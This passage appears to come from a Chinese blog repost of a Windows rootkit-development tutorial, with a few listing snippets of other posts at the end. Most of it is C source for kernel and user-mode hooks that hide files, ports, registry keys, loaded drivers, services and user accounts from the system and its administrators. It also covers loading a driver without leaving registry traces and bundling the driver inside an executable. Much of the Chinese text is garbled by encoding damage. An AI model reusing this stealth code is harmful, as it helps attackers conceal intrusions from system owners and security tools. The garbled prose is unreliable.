IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN ReturnOnlyOneEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartQuery);

hFile为文件句柄，由ZwCrateFile或ZwOpenFile获得�Q�FileInfoClass是一个不断变化的枚�D�c�d��Q�但只有4个同文�g/目录有关。FileInformationBuffer是返回的信息指针。我们要隐藏文�g/目录�Q�就要处理这4个不同的枚�D�c�d��Q�它们的数值分别是�Q?�?�?�?2�Q�分别对�?个不同的�l�构�Q�由于结构内�Ҏ��较长�Q�所以只介绍信息�c�Mؓ12的内容，其他可以在光盘中的FileInfo.txt中找到。信息类�?2�q�回的结果如下：

typedef struct file_name_info {
ULONG NextEntryOffset; //文�g偏移
ULONG Unknown; //下一文�g索引
ULONG FileNameLength; //文�g长度
WCHAR FileName[1]; //文�g�?br>}FILE_NAMES_INFORMATION,*LPFILE_NAMES_INFORMATION;

隐藏文�g/目录的方法和隐藏�q�程基本上一��P��如果没有文�g/目录被找刎ͼ�应该�q�回0x80000006�?br>
NTSTATUS NewZwQueryDirectoryFile (
IN HANDLE hFile,
……)
{
......
//��h��原函�?br>ntStatus=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (hFile,……);

if (NT_SUCCESS(ntStatus) && FileInfoClass==12)
{
//指向文�g列表�~�冲�?br>FileCurr=(LPFILE_NAMES_INFORMATION)FileInformationBuffer;
do {
LastOne=!(FileCurr->NextEntryOffset); //取偏�U?br>FileNameLength=FileCurr->FileNameLength; //取长�?br>RtlInitUnicodeString(&FileNameWide,FileCurr->FileName);
RtlUnicodeStringToAnsiString(&FileNameAnsi,&FileNameWide,TRUE);
if (_strnicmp(HIDDEN_SYSTEM_FILE,FileNameAnsi.Buffer,
(FileNameLength / 2))==0)
{
//最后一个文�?br>if (LastOne)
{
if (FileCurr==(LPFILE_NAMES_INFORMATION)
FileInformationBuffer)
ntStatus=0x80000006; //隐藏
else
FilePrev->NextEntryOffset=0;
}
else
{
//�U�d��文�g偏移
Pos=((ULONG)FileCurr)-((ULONG)FileInformationBuffer);
Left=(DWORD)FileInformationBufferLength-Pos-
FileCurr->NextEntryOffset;
RtlCopyMemory((PVOID)FileCurr,(PVOID)((char *)
FileCurr+FileCurr->NextEntryOffset),(DWORD)Left);
continue;
}
}

//下一文�g
FilePrev=FileCurr;
FileCurr=(LPFILE_NAMES_INFORMATION)((char *)
FileCurr+FileCurr->NextEntryOffset);
}while (!LastOne);
}

……
return ntStatus;
}

HIDDEN_SYSTEM_FILE同样是宏�Q�另外，文�g长度是以Unicode�l�计的，一个字�W�占16位，而比较语句是以ANSI比较的，一个字�W�占8位，所以_strnicmp函数最后的比较大小是FileNameLength / 2�Q�如果以Unicode比较�Q�就不必除以2了。在来看看隐藏端口�?br>

六、隐藏端�?br>

枚�D端口使用iphlpapi.dll中的函数�Q�而它们最�l�调用的是ZwDeviceIoControlFile函数�Q��用它发送一个特定的IRP获取端口列表�Q�所以只要HOOK了ZwDeviceIoControlFile函数�Q�就可以隐藏端口。函数原型如下：

NTSYSAPI NTSTATUS NTAPI ZwDeviceIoControlFile (
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG IoControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);

FileHandle为通信讑֤�的句柄，可以使用ZwQueryObject函数获得其具体信息，对于端口讑֤�的，它的名字��L��\Device\Tcp或\Device\Udp�Q�IoControlCode为特定的I/O控制代码�Q�表�C��查询的信息。InputBuffer和OutputBuffer分别��入输出缓册Ӏ?br>
查询端口的I/O控制代码�?个，分别为：0x210012�?x120003�Q�它们所�q�回的结构、分辨TCP/UDP端口都是不同的，需要分别对待。在我的Windows 2000 SP4下，Netstat使用0x120003�Q�而Fport却��?x210012。对�?x120003�Q�返回的�l�构如下�Q?br>
typedef struct tcpaddrentry //TCP
{
ULONG TcpState; //状�?br>ULONG TcpLocalAddr; //本地地址
ULONG TcpLocalPort; //本地端口
ULONG TcpRemoteAddr; //�q�程地址
ULONG TcpRemotePort; //�q�程端口
}TCPADDRENTRY,*LPTCPADDRENTRY;

typedef struct udpaddrentry //UDP
{
ULONG UdpLocalAddr; //UDP只有本地地址
ULONG UdpLocalPort; //端口
}UDPADDRENTRY,*LPUDPADDRENTRY;

很熟悉吧�Q�这正是iphlpapi.dll中的函数�q�回的结构。对于这2个结构，�q�可以扩展，则会增加一个进�E�ID�Q�不�q�只适用XP/2003�Q�结构就不帖了，可以在RootkitMain.h中查扑ֈ�。��用这个I/O控制代码�q�行端口查询�Q�FileHandle的名字��L��\Device\Tcp�Q�所以区别TCP和UDP的方法是��查InputBuffer�Q�包括判断是否�ؓ扩展�l�构�?br>
对于TCP查询�Q�输入缓冲的特征是InputBuffer[0]�?x00�Q�如果OutputBuffer中已�l�有了端口数据，则InputBuffer[17]�?x01�Q�如果是扩展�l�构�Q�则InputBuffer[16]�?x02。对于UDP查询�Q�InputBuffer[0]��׃ؓ0x01了，InputBuffer[16]和InputBuffer[17]的值和TCP查询是一��L��。我们��用这3个值来区分TCP/UDP端口和是否�ؓ扩展�l�构�Q�OutputBuffer�q�回的是完整的端口列表缓冲区�Q��用IoStatusBlock取得端口的数量，隐藏某个端口�Q�就向前�U�d��~�冲区。对�?x210012�Q�返回的�l�构如下�Q?br>
typedef struct tdiconnectinfo
{
ULONG State;
ULONG Event;
ULONG TransmittedTsdus;
ULONG ReceivedTsdus;
ULONG TransmissionErrors;
ULONG ReceiveErrors;
LARGE_INTEGER Throughput;
LARGE_INTEGER Delay;
ULONG SendBufferSize;
ULONG ReceiveBufferSize;
BOOLEAN Unreliable;
}TDI_CONNECTION_INFO,*LPTDI_CONNECTION_INFO;

使用�q�个I/O控制代码�q�行端口查询�Q�FileHandle的名字是\Device\Tcp或\Device\Udp�Q�所以分别TCP或UDP不需要输入缓�Ԍ��而是使用ZwQueryObject函数获取句柄的名字。OutputBuffer�q�回的是单独的缓冲区�Q�也��是��_��一个端口返回一个，隐藏某个端口�Q�就��返回��D��|��ؓSTATUS_INVALID_ADDRESS卛_��?br>
NTSTATUS NewZwDeviceIoControlFile (
IN HANDLE FileHandle,
......)
{
......
//��h��原函�?br>ntStatus=((ZWDEVICEIOCONTROLFILE)(OldZwDeviceIoControlFile))(FileHandle,……);

if ((NT_SUCCESS(ntStatus)) && (IoControlCode==0x210012))
{
//查询句柄名称以便��定是TCP�q�是UDP
if (NT_SUCCESS(ZwQueryObject(FileHandle,
OBJECT_NAME_INFORMATION_CLASS,ObjectName,512,&RetLen)))
{
//指向端口列表�~�冲�?br>lpTdiConnInfo=(LPTDI_CONNECTION_INFO)OutputBuffer;
RtlUnicodeStringToAnsiString(&ObjectNameAnsi,&ObjectName->Name,TRUE);

//TCP端口
if (_strnicmp(ObjectNameAnsi.Buffer,TCP_PORT_DEVICE,
strlen(TCP_PORT_DEVICE))==0)
{
if (ntohs(lpTdiConnInfo->ReceivedTsdus)==HIDDEN_SYSTEM_PORT)
ntStatus=STATUS_INVALID_ADDRESS; //隐藏
}

//UDP端口
if (_strnicmp(ObjectNameAnsi.Buffer,UDP_PORT_DEVICE,
strlen(UDP_PORT_DEVICE))==0)
{
if (ntohs(lpTdiConnInfo->ReceivedTsdus)==HIDDEN_SYSTEM_PORT)
ntStatus=STATUS_INVALID_ADDRESS; //隐藏
}
}
}

if ((NT_SUCCESS(ntStatus)) && (IoControlCode==0x120003))
{
if (NT_SUCCESS(ZwQueryObject(FileHandle,
OBJECT_NAME_INFORMATION_CLASS,ObjectName,512,&RetLen)))
{
RtlUnicodeStringToAnsiString(&ObjectNameAnsi,&ObjectName->Name,TRUE);
if (_strnicmp(ObjectNameAnsi.Buffer,TCP_PORT_DEVICE,
strlen(TCP_PORT_DEVICE))==0)
{
if (((InBuf=(LPBYTE)InputBuffer)==NULL) || (InputBufferLength<17))
//错误处理

if ((InBuf[0]==0x00) && (InBuf[17]==0x01)) //TCP端口
{
if (InBuf[16]!=0x02) //非扩展结�?br>{
//获取端口个数
Num=IoStatusBlock->Information / sizeof (TCPADDRENTRY);
lpTcpAddrEntry=(LPTCPADDRENTRY)OutputBuffer;

for (n=0; n{
if (ntohs(lpTcpAddrEntry[n].TcpLocalPort)==
HIDDEN_SYSTEM_PORT)
{

//向前�U�d��端口列表�~�冲�?br>memcpy((lpTcpAddrEntry+n),(lpTcpAddrEntry+n+1),
((Num-n-1) * sizeof (TCPADDRENTRY)));
Num--; //��L��--
n--;
break;
}
}

//隐藏后端口��L��
IoStatusBlock->Information=Num * sizeof (TCPADDRENTRY);
......
}
}
……
}
}
}

return ntStatus;
}

0x120003查询的UDP和处理扩展结构的代码��׃��帖了�Q�和处理TCP一��P��无非��是�l�构不同�Q�隐藏都是memcpy�U�d��~�冲。还有必��L��查InBuf[17]是否�?x01�Q�否则指向的OutputBuffer��是NULL指针了。下面的内容是隐藏注册表�?br>

七、隐藏注册表

枚�D注册表键和键��g��用的Native API是ZwEnumerateKey和ZwEnumerateValueKey函数�Q�它们所做的工作基本一��P��都是使用索引获取�?键��|��q�返回一个缓冲区指针。ZwEnumerateKey函数原型如下�Q�ZwEnumerateValueKey函数和它几乎一��P��׃��帖出来了�?br>
NTSYSAPI NTSTATUS NTAPI ZwEnumerateKey (
IN HANDLE KeyHandle, //句柄
IN ULONG Index, //��h��的烦�?br>IN KEY_INFORMATION_CLASS KeyInformationClass, //获取的信息类�?br>OUT PVOID KeyInformation, //�q�回的缓冲区指针
IN ULONG Length, //长度
OUT PULONG ResultLength); //实际长度

DDK中公开了若�q�注册表函数�Q�所以这2个函数的�l�构�Q�枚丄��型都已经定义好了�Q�直接��用就可以了。KeyInformationClass一�?个��|��可喜的是我们不必逐个处理�Q�统一处理��可以了�Q�因为只需要注册表�?键值名和其长度�Q�而返回的�q?个结构中都包含这2个结构成员，所以才可以�l�一处理。这里我们��用KEY_BASIC_INFORMATION�l�构�?br>
typedef struct _KEY_BASIC_INFORMATION {
LARGE_INTEGER LastWriteTime;
ULONG TitleIndex;
ULONG NameLength;
WCHAR Name[1];
}KEY_BASIC_INFORMATION,*PKEY_BASIC_INFORMATION;

�q�里我们需要的东西是Name和它的长度NameLength。而对于ZwEnumerateValueKey函数�Q�我们��用KEY_VALUE_BASIC_INFORMATION�l�构�Q�和KEY_BASIC_INFORMATION几乎一��P��所以请查询DDK Documentation文档�Q��?br>
枚�D注册表键/键��|��是通过索引获取的，�q�样的话�Q�我们隐藏了一个注册表�?键��|��那其后的所有烦引都需要改变。这里就需要有一个标界，理所当然是利用KeyHandle的��|��不同子键的句柄值是不同的。�D个例子，例如隐藏了KeyHandle�?下的某一个注册表键，那么其后KeyHandle�?下的所有烦引（注册表键�Q�都需�?1�Q�而不是KeyHandle�?的就不需要加了。具体看一下代码，�q�里仍以ZwEnumerateKey函数��Z��?br>
NTSTATUS NewZwEnumerateKey (
IN HANDLE KeyHandle,
......)
{
......
static HANDLE RegHandle=NULL;
static LONG RegIndex=0;

if (RegHandle==KeyHandle) //同一句柄
Index+=RegIndex; //加上隐藏的注册表键个�?br>else
{
RegIndex=0; //否则重新赋��gؓ0
RegHandle=NULL;
}

//��h��原函�?br>ntStatus=((ZWENUMERATEKEY)(OldZwEnumerateKey)) (KeyHandle,……);

if (NT_SUCCESS(ntStatus))
{
//指向注册表键�~�冲�?br>lpKeyBasic=(KEY_BASIC_INFORMATION *)KeyInformation);
RtlInitUnicodeString(&RegsNameWide,lpKeyBasic->Name);
RtlUnicodeStringToAnsiString(&RegsNameAnsi,&RegsNameWide,TRUE);

if (_strnicmp(HIDDEN_SYSTEM_KEY,RegsNameAnsi.Buffer,
(lpKeyBasic->NameLength / 2))==0)
{
RegHandle=KeyHandle; //取句柄�?br>RegIndex++; //隐藏个数
Index++; //索引�?

//再次��h�� 跌��隐藏的注册表�?br>ntStatus=((ZWENUMERATEKEY)(OldZwEnumerateKey)) (KeyHandle,……);
}
}

……
return ntStatus;
}

使用�q�种�Ҏ��隐藏注册表键/键��|��发现有时不同子键的KeyHandle��g��是相同的�Q�这��造成了多隐藏数据。解决的办法是HOOK了ZwOpenKey函数�Q��用ZwOpenKey函数的KeyHandle枚�D�?键��|��使用ZwEnumerateKey和ZwEnumerateValueKey函数�Q�，�q�记录下需要隐藏的索引�Q�然后在ZwEnumerateKey或ZwEnumerateValueKey函数中Index参数�q�行比较�Q�如果相�{�，��隐藏了�Q�烦�?1卛_��Q�，�q�样上面的问题就可以解决了。如果想要做的更隐蔽�Q�像ZwQueryKey、ZwDeleteKey�{�函数都需要HOOK�Q�我�q�里只是演示�E�序�Q�没写这么详�l�，�q�些内容��q��l�各位读者自己实践了�Q�嘿嘿，�q�叫��h��Q��?br>

八、隐藏内核模�?br>

所谓内核模块，��是内核加蝲的驱动信息，DDK中的Drivers.exe可以枚�D出系�l�的内核模块列表�Q�它最�l�调用的是ZwQuerySystemInformation函数�Q�信息类�?1�Q�表�C��取系�l�的内核模块。如果要隐藏某个内核模块�Q�就像上边介�l�隐藏系�l�句柄一��P��memcpy�U�d��~�冲区，所以这里介�l�另一�U�隐藏方法：从PsLoadedModuleList链上摘除内核模块。PsLoadedModuleList是系�l�中一个未公开的内核变量（LIST_ENTRY链表�Q�，保存着�pȝ��的内核模块。��用这�U�方法隐藏的关键是找到PsLoadedModuleList的地址�Q�好在前人已�l�给��Z��Ҏ��Q�用驱动�E�序对象+14h卛_��定位PsLoadedModuleList。我们首先需要定义一个结构（�q�个�l�构虽然不是完整的，但我可以保证它正常工作）。GetPsLoadedModuleList函数查找PsLoadedModuleList的地址�Q�HideAmlName函数隐藏内核模块�Q�代码如下：

typedef struct moduleentry
{
LIST_ENTRY ListEntry;
DWORD Unknown[4];
DWORD Base;
DWORD DriverStart;
DWORD Unknown1;
UNICODE_STRING DriverPath;
UNICODE_STRING DriverName;
}MODULE_ENTRY,*LPMODULE_ENTRY;

DWORD GetPsLoadedModuleList (IN PDRIVER_OBJECT DriverObject)
{
......
if (DriverObject)
{
//驱动�E�序对象+14h处是PsLoadedModuleList地址
if ((lpModuleEntry=*((LPMODULE_ENTRY *)
((DWORD)DriverObject+0x14)))==NULL)
{
//错误处理
}
}

return (DWORD)lpModuleEntry; //�q�回PsLoadedModuleList地址
}

NTSTATUS HideAmlName (TCHAR *HideModule)
{
if (ModuleEntry)
CurrentModuleEntry=ModuleEntry;
else
return STATUS_UNSUCCESSFUL;
//�q�是双向链表
while ((LPMODULE_ENTRY)CurrentModuleEntry->ListEntry.Flink!=ModuleEntry)
{
if ((CurrentModuleEntry->Unknown1!=0) &&
(CurrentModuleEntry->DriverPath.Length!=0))
{
RtlUnicodeStringToAnsiString(&DriverNameAnsi,
&CurrentModuleEntry->DriverName,TRUE);

if (_strnicmp(HideModule,DriverNameAnsi.Buffer,
strlen(DriverNameAnsi.Buffer))==0)
{
*((DWORD *)CurrentModuleEntry->ListEntry.Blink)=
(DWORD)CurrentModuleEntry->ListEntry.Flink;
CurrentModuleEntry->ListEntry.Flink->Blink=
CurrentModuleEntry->ListEntry.Blink;
break;
}
}
//向下�U�d��
CurrentModuleEntry=(LPMODULE_ENTRY)
CurrentModuleEntry->ListEntry.Flink;
}

return STATUS_SUCCESS;
}

从PsLoadedModuleList链上摘除内核模块后，ZwQuerySystemInformation函数��无法枚丑և�它了�?br>

九、用��h��HOOK

用户态的HOOK有很多方法，比如修改函数的前5个字节，修改输入表等�Q�这里采用eyas大哥的方法COPY DLL�Q�主要是�q�种�Ҏ��效率不错。HOOK新进�E�采用消息钩子，所以需要编写成DLL�?br>
HOOK的步骤首先将需要HOOK的DLL加蝲到当前进�E�的地址�I�间中，然后使用PSAPI中的GetModuleInformation函数获取DLL信息�Q�目的是得到DLL的加载地址�?br>
BOOL InitHookDll (TCHAR *Name,LPDLLINFO lpHookDllInfo)
{
//取得摸快句炳
if ((lpHookDllInfo->hModule=LoadLibrary(Name))==NULL)
{
//错误处理
}

//获取摸快信息
if (!GetModuleInformation(GetCurrentProcess(),lpHookDllInfo->hModule,
&lpHookDllInfo->ModuleInfo,sizeof(MODULEINFO)))
{
//错误处理
}

if ((lpHookDllInfo->NewBase=malloc
(lpHookDllInfo->ModuleInfo.SizeOfImage))==NULL)
{
//错误处理
}

//取得摸快地址
memcpy(lpHookDllInfo->NewBase,lpHookDllInfo->ModuleInfo.lpBaseOfDll,
lpHookDllInfo->ModuleInfo.SizeOfImage);
return TRUE;
}

DLLINFO是一个自定义�l�构�Q�保存着模块的句柄、地址�{�。DLL加蝲后，模块信息也有了，下面使用GetProcAddress函数取HOOK函数地址�Q�VirtualQuery函数获取虚拟内存信息�Q�VirtualProtect函数改变��面属性，最后修改原函数的地址�Q�GetProcAddress函数的返回��|��使其指向我们的代码�?br>
BOOL HookUserApi (LPDLLINFO lpHookDllInfo,TCHAR *Name,DWORD OldFunc,DWORD *NewFunc)
{
//取得需要HOOK函数的地址
if ((OrigFunc=(DWORD) GetProcAddress (lpHookDllInfo->hModule,Name))==NULL)
{
//错误处理
}

//获取虚拟内存信息
if (!VirtualQuery((LPVOID)OrigFunc,&mbi,
sizeof(MEMORY_BASIC_INFORMATION)))
{
//错误处理
}

//改变��面属性�ؓ读，写，执行
if (!VirtualProtect(mbi.BaseAddress,mbi.RegionSize,
PAGE_EXECUTE_READWRITE,&Protect))
{
//错误处理
}

//HOOK
JmpCode.mov_eax=(BYTE)0xB8;
JmpCode.address=(LPVOID)OldFunc;
JmpCode.jmp_eax=(WORD)0xE0FF;

//计算原函数地址
*NewFunc=OrigFunc - (DWORD)lpHookDllInfo->ModuleInfo.lpBaseOfDll
+ (DWORD)lpHookDllInfo->NewBase;
//修改原函数地址�Q�指向OldFunc
memcpy((LPVOID)OrigFunc,(UCHAR *)&JmpCode,sizeof(ASMJUMP));
return TRUE;
}

JmpCode是HOOK�l�构�Q�保存着我们的函数的地址和JMP的蟩转地址。有了上面这2个函敎ͼ��可以HOOK��M��DLL中的函数了，例如枚�D用户使用的是NetUserEnum函数�Q�封装在Netapi32.dll中，HOOK例子如下�Q?br>
DWORD WINAPI HookMain (LPVOID lpNot)
{
if (!(InitHookDll("netapi32.dll",&Netapi32)))
{
//错误处理
}

if (!(HookUserApi(&Netapi32,"NetUserEnum",(DWORD)HookNetUserEnum,
&NewNetUserEnum)))
{
//错误处理
}

......
}

HookMain函数需要在DllMain中调用，因�ؓ消息钩子加蝲DLL后，��应该立刻进行API HOOK。Netapi32是DLLINFO�l�构�Q�保存着Netapi32.dll的信息；HookNetUserEnum是我们的函数�Q�NewNetUserEnum是原函数地址。现在只差消息钩子函��C��Q�安�?卸蝲消息钩子的函数需要引出，消息钩子的类型是WH_GETMESSAGE�Q�钩子回调函��C��么都不做�Q�只是向下传递，因�ؓ我们的目的是使新�q�程加蝲DLL�?br>
LRESULT WINAPI Hook (int nCode,WPARAM wParam,LPARAM lParam)
{
//向下传�?br>return CallNextHookEx(hHook,nCode,wParam,lParam);
}

extern "C" __declspec(dllexport) BOOL InstallHook()
{
//安装钩子
if ((hHook=SetWindowsHookEx(WH_GETMESSAGE,(HOOKPROC)Hook,
hInst,0))==NULL)
{
//错误处理
}
return TRUE;
}

extern "C" __declspec(dllexport) BOOL UninstallHook()
{
//卸蝲钩子
return UnhookWindowsHookEx(hHook);
}

hInst是在DllMain函数中保存的句柄�Q�这是必��ȝ��Q�否则钩子不会安装成功。用��h��的HOOK有很多种�Ҏ��Q�用哪个随便你了�Q�只要能HOOK API��p��Q�下面介�l�隐藏服�?驱动�?br>

十、隐藏服�?驱动

枚�D服务使用的是Advapi32.dll中的5个函敎ͼ��q?个函数在每个Windows�pȝ��中的联系都不一��P��所以需要HOOK所有函数�?br>
EnumServicesStatusA()
EnumServicesStatusW()
EnumServicesStatusExA()
EnumServicesStatusExW()
EnumServiceGroupW()

�q?个函��C��Q�前4个是公开的，在MSDN中均有叙�q�ͼ�只有最后一个是MS没有公开的，而且只有Unicode版的函数。它的参数和其他4个函数基本一��P��q�回的结构是LPENUM_SERVICE_STATUS�Q�这个结构也是EnumServicesStatus函数所�q�回的�?个函��C��都有一个dwServiceType参数�Q�表�C�服务类型，SERVICE_WIN32表示标准Win32服务�Q�SERVICE_DRIVER表示讑֤�驱动。lpServicesReturned��回服务��L��Q�隐藏的�Ҏ��q�是memcpy�U�d��~�冲区。我们以EnumServiceGroupW函数��Z��Q�来看一下代码�?br>
BOOL WINAPI HookEnumServiceGroupW (SC_HANDLE hSCManager,……)
{
......
__asm
{
//参数入栈�Q�注意顺序，要遵循__stdcall调用�U�定
push dwUnknown
push lpResumeHandle
push lpServicesReturned
push pcbBytesNeeded
push cbBufSize
push lpServices
push dwServiceState
push dwServiceType
push hSCManager
mov eax,NewEnumServiceGroupW //原函数地址攑օ�EAX
call eax //��h��
mov sRet,eax //�q�回�?br>}

if (sRet)
{
//处理服务和驱�?br>if (dwServiceType==SERVICE_WIN32 || dwServiceType==SERVICE_DRIVER)
{
//指向服务列表�~�冲�?br>lpEnumServiceGroupW=(LPENUM_SERVICE_STATUSW)lpServices;
for (DWORD n=0; n<*lpServicesReturned; n++)
{
......
if (strnicmp(HIDDEN_SYSTEM_SERVICE,ServiceNameAnsi,
strlen(ServiceNameAnsi))==0)
{
//向前�U�d��服务列表�~�冲�?br>memcpy((lpEnumServiceGroupW+n),(lpEnumServiceGroupW+n+1),
((*lpServicesReturned)-n-1) * sizeof (ENUM_SERVICE_STATUSW));
(*lpServicesReturned)--; //��L��?1
n--;
}
}
}
}

return sRet;
}

上边的代码应该很�Ҏ��理解了，我们隐藏服务/驱动�Q�只需要判断服务名�Q�所以dwServiceType��׃��块处理了�Q�不必分开。另外请求原函数要遵循__stdcall调用�U�定�Q�参��C��叛_��左顺序入栈，最后将原函数地址攑օ�EAX中CALL卛_��?br>

十一、隐藏用�?br>

枚�D用户�?�U�方法，其一是��用Netapi32.dll中的函数�Q�另一个就是枚举注册表的SAM键了。隐藏注册表前边已经说过了，�q�里说一下Netapi32.dll导出�?个函敎ͼ�

NetUserEnum()
NetGroupGetUsers()
NetQueryDisplayInformation()

�W�一个函数是枚�D用户�Q�第二个函数是获取组内的用户�Q�但�Ҏ��MSDN的描�q�ͼ��q�个函数只适用于域控制器；�W�三个函数可以枚丄��戗��组和计��机。NetUserEnum函数支持8�U�枚丄��型，每种�c�d��q�回的结构有些不同（其实只是�l�构成员的名字不同）�Q�需要分别处理，另外2个函��C��有多�U�类型，但只有一�U�是枚�D用户的，HOOK�q�个�c�d��可以了�?个函数的隐藏�Ҏ��都是memcpy�U�d��~�冲区，�q�里以NetUserEnum函数、枚丄��型�ؓ0�q�行介绍�Q�其�?个函数和它是一��L��Q�只是结构体不同�?br>
NET_API_STATUS WINAPI HookNetUserEnum (LPCWSTR servername,……)
{
......
__asm
{
push resume_handle
push totalentries
push entriesread
push prefmaxlen
push bufptr
push filter
push level
push servername
mov eax,NewNetUserEnum
call eax
mov nStatus,eax
}

if ((nStatus==NERR_Success) && (bufptr!=NULL))
{
if (level==0) //处理枚�D�c�d��?
{
//注意bufptr�?�U�指�?br>LPUSER_INFO_0 lpUserInfo=*((LPUSER_INFO_0 *)bufptr);
if ((nStatus==NERR_Success) || (nStatus==ERROR_MORE_DATA))
{
for (DWORD n=0;n<*entriesread;n++)
{
......
if (strnicmp(HIDDEN_SYSTEM_USER,UserNameAnsi,
strlen(UserNameAnsi))==0)
{
//向前�U�d��用户列表�~�冲�?br>memcpy((lpUserInfo+n),(lpUserInfo+n+1),
((*entriesread)-n-1) * sizeof (USER_INFO_0));
(*entriesread)--; //��L��--
n--;
}
}
}
}

......
}

return nStatus;
}

Level表示枚�D�c�d��Q�MSDN中有详细的定义。这3个函数都是Unicode版本�Q�没有ANSI�?br>

十二、驱动的加蝲与整�?br>

加蝲驱动一般都是��用Servcie API�Q�但Servcie API创徏的服务会在注册表留下痕迹�Q�这不是我们惌��的，应该使用一�U�更好的�Ҏ��。Native API�?个函敎ͼ�可以实现驱动的动态加/卸蝲�Q�不用写注册表，它们是ZwLoadDriver和ZwUnloadDriver函数。��用这2个函数加/卸蝲驱动�Q�也需要写一下注册表�Q�不�q�只是配合这2个函敎ͼ�待驱动加/卸蝲完成后，��可以删除徏立的注册表项�Q�也��是��_��我们建立的注册表��Ҏ��多停留几�U�。需要徏立的注册表项��是一些服务的键��|��比如Type�Q�服务类型）�Q�Start�Q�启动类型）�Q�ImagePath�Q�驱动�\径）�{�，完整的代码在DevelopmentSetRegistry函数中，��׃��帖出来了�Q�只帖出动态加/卸蝲的函��C��码。注�Q�动态加/卸蝲驱动�Ӟ��已经完成了设�|�注册表�Q�动态加/卸蝲驱动后，�q�要删除注册表项�Q�切记�?br>
BOOL DevelopmentLaodDriver (WCHAR *DriverName,BOOL LoadBelong)
{
......
//加蝲ntdll.dll
if ((hModule=LoadLibrary("ntdll.dll"))==NULL)
{
//错误处理
}

//取得若干函数的地址
ZwLoadDriver=(ZwLoadDriverOld) GetProcAddress (hModule,"ZwLoadDriver");
ZwUnloadDriver=(ZwUnloadDriverOld) GetProcAddress (hModule,"ZwUnloadDriver");
RtlInitUnicodeString=(RtlInitUnicodeStringOld) GetProcAddress
(hModule,"RtlInitUnicodeString");
RtlNtStatusToDosError=(RtlNtStatusToDosErrorOld) GetProcAddress
(hModule,"RtlNtStatusToDosError");

swprintf(RegDriver,L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\%s",
DriverName);
RtlInitUnicodeString(&ModuleNameWide,RegDriver);

if (LoadBelong) //TRUE 加蝲
{
//加蝲驱动
ntStatus=ZwLoadDriver(&ModuleNameWide);
......
}

if (!LoadBelong) //FALSE卸蝲
{
//卸蝲驱动
ntStatus=ZwUnloadDriver(&ModuleNameWide);
......
}

return TRUE;
}

我们需要��用一个EXE来操作SYS�Q�这样带着2个文件满处跑肯定不方便，所以有必要��其整合。整合的�Ҏ��有很多，比如攑֜�EXE�l�尾、将SYS转化�?6�q�制代码�Q�或者做成资源文件。相比之下，做成资源文�g比较��单，也不会给EXE增加太多的体�U�，�q�行时一释放��OK了。释放资源需要一�p�d��资源函数�Q�最后��用fwrite��文件写入硬盘。我写了一个ReleaseResource函数�Q�用于实现这个功能�?br>
BOOL ReleaseResource (TCHAR *DriverPath)
{
......
//查找资源 SYS是资源名 SYSRES是资源类�?br>if ((hFind=FindResource(NULL,"SYS","SYSRES"))==NULL)
{
//错误处理
}

//加蝲资源
if ((hLoad=LoadResource(NULL,hFind))==NULL)
{
//错误处理
}

//取得资源大小
if ((Size=SizeofResource(NULL,hFind))==0)
{
//错误处理
}

//取得释放地址
if ((LockAddr=LockResource(hLoad))==NULL)
{
//错误处理
}

//打开文�g
if ((fp=fopen(DriverPath,"wb"))==NULL)
{
//错误处理
}

//写入
fwrite(LockAddr,1,Size,fp);
......
}

有了�q�个函数�Q�就可以只带着EXE满世界跑了�?br>文章写了�q�么长，是时候结束了�Q�从上面的讲解中不难看出�Q�我们只要对Windows内核有一点了解，��可以开发一个简单的Rootkit�Q�光盘中包含了本文完整的源代码，如对本文有�Q何问题，�Ƣ迎发邮件给�?a href="mailto:dahubaobao@eviloctal.com">dahubaobao@eviloctal.com�?br>
十三、附录下�?br>
FileInfo(枚�D文�g目录�l�构)
包含隐藏服务/驱动、用户以及用��h��HOOK的DLL�E�序
包含隐藏�q�程、文�?目录、端口、注册表和内核模块的SYS以及加蝲�E�序

saga.constantine 2008-06-10 21:55 发表评论

saga.constantine — Tue, 10 Jun 2008 13:15:00 GMT

摘要: 转蝲学习原文�Q�http://blog.csdn.net/SpiderF/archive/2005/04/05/336594.aspx 在NT�p�d��操作�pȝ��里让自己“消失” 1. 内容2. 介绍3. 文�g 3.1 NtQueryDirectoryFile 3.2 NtVdmControl4. �q�程5. ... 阅读全文

saga.constantine 2008-06-10 21:15 发表评论

saga.constantine — Tue, 10 Jun 2008 09:48:00 GMT

      自己写的PE�?�D�工�?nbsp; 比较��?nbsp; 高手�W�过
      支持文�g拖放�Q��d��最上�?nbsp; 不支持含有overlap的程序�?br>
     �E�序下蝲�Q?nbsp; http://www.shnenglu.com/Files/saga/MyZeroAdd.rar

      源码下蝲�Q?nbsp; http://www.shnenglu.com/Files/saga/MyZeroAdd%20vc6%20code.rar

      如有bug�Q�请指出�Q�谢谢�?br>
                                                                                                   ------------------saga.constantine

saga.constantine 2008-06-10 17:48 发表评论

[转蝲]NtQuerySystemInformation

saga.constantine — Sat, 07 Jun 2008 08:53:00 GMT

輔助材料……原文地址�Q�http://hi.baidu.com/ring3world/blog/item/3f0fb1dbf1fa0a65d0164eab.html

Native API乃Windows用户模式中�ؓ上层Win32 API提供接口的本机系�l�服务。��^常我们��L��调用MS为我们提供的公用的Win32 API函数来实现来实现我们�pȝ��的功能。今天我们要谈的是如何通过本机�pȝ��服务(Native API�Q�来探测本机�pȝ��信息。当�Ӟ��微��Y没有为我们提供关于本机系�l�服务的文档 (Undocumented)�Q�也��是不会为对它的使用提供��M��的保证，所以我们不提倡��用Native API来开发��Y件。不�q�在�Ҏ��情况下，本机�pȝ��服务却�ؓ我们提供了通向“�U�密”的捷径。本文提到的信息仅在Windows2000/XP/2003上测�?�q��?br>
